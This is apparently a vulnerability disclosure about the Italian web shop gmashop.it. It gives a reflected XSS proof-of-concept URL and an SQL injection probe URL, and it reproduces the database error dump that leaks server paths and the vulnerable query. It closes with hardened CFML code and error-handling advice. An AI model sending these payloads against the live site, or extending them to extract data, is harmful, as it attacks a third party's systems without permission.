
gmashop.it | xss


XSS
https://www.gmashop.it/Ricerca.cfm?testo="><img onError="alert(1)" src="a" /><"
archived: http://archive.is/P0OXI

SQL Injection
sample raising an error
https://www.gmashop.it/Inside.cfm?sezione=PRODOTTI&area=PRODOTTI&mod=elenco&apmenu=partner&codpar=2'00
archived: http://archive.is/ufpwM


 Error Executing Database Query.
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '''00 AND LINGUA = 'IT'' at line 3

The error occurred in /var/www/html/gmashop/Query/Prodotti/SelNomePar.cfm: line 5
Called from /var/www/html/gmashop/Prodotti/Prodotti_elenco.cfm: line 89
Called from /var/www/html/gmashop/Prodotti/Prodotti_elenco.cfm: line 84
Called from /var/www/html/gmashop/Prodotti/Prodotti_elenco.cfm: line 1
Called from /var/www/html/gmashop/Inside.cfm: line 48
Called from /var/www/html/gmashop/Query/Prodotti/SelNomePar.cfm: line 5
Called from /var/www/html/gmashop/Prodotti/Prodotti_elenco.cfm: line 89
Called from /var/www/html/gmashop/Prodotti/Prodotti_elenco.cfm: line 84
Called from /var/www/html/gmashop/Prodotti/Prodotti_elenco.cfm: line 1
Called from /var/www/html/gmashop/Inside.cfm: line 48

3 :     WHERE
4 :     cod= <cfif isdefined('URL.CODPAR') AND URL.CODPAR neq ''>#URL.CODPAR#<cfelseif isdefined('SelOggetti.COD_PARTNER')>#SelOggetti.COD_PARTNER#<cfelse>0</cfif>
5 :      AND LINGUA = '#SESSION.lingua_sito#'
6 : </cfquery>

SQLSTATE       42000
DATASOURCE       gmashop
VENDORERRORCODE       1064
SQL        SELECT TITOLO,cod FROM partner WHERE cod= 2''00 AND LINGUA = 'IT'
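
Fix for the query in SelNomePar.cfm, as an added example (not code from the site or from this report): the value is validated and then bound with cfqueryparam instead of being interpolated into the SQL text. Assumptions: the query name SelNomePar, the variable codPartner, an integer partner.cod column and a two-letter language code.

```cfml
<!--- Added example: hardened form of the query shown in the error dump above. --->
<!--- Assumed, not taken from the page: query name, codPartner, column types. --->

<!--- Resolve the partner code with the same precedence as the original cfif chain. --->
<cfif structKeyExists(URL, "CODPAR") AND URL.CODPAR neq "">
    <cfset codPartner = URL.CODPAR>
<cfelseif isDefined("SelOggetti.COD_PARTNER")>
    <cfset codPartner = SelOggetti.COD_PARTNER>
<cfelse>
    <cfset codPartner = 0>
</cfif>

<!--- Allow digits only; a value such as 2'00 is rejected before any query runs. --->
<cfif reFind("^[0-9]{1,9}$", codPartner) EQ 0>
    <cfheader statuscode="400">
    <cfabort>
</cfif>

<cfquery name="SelNomePar" datasource="gmashop">
    SELECT TITOLO, cod
    FROM partner
    WHERE cod = <cfqueryparam value="#codPartner#" cfsqltype="cf_sql_integer">
      <!--- The session value is bound as well, so no variable reaches the SQL text. --->
      AND LINGUA = <cfqueryparam value="#SESSION.lingua_sito#" cfsqltype="cf_sql_varchar" maxlength="2">
</cfquery>
```

The error page itself also discloses template paths, the datasource name and the full SQL statement; production should return a generic error template and log the detail server-side.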
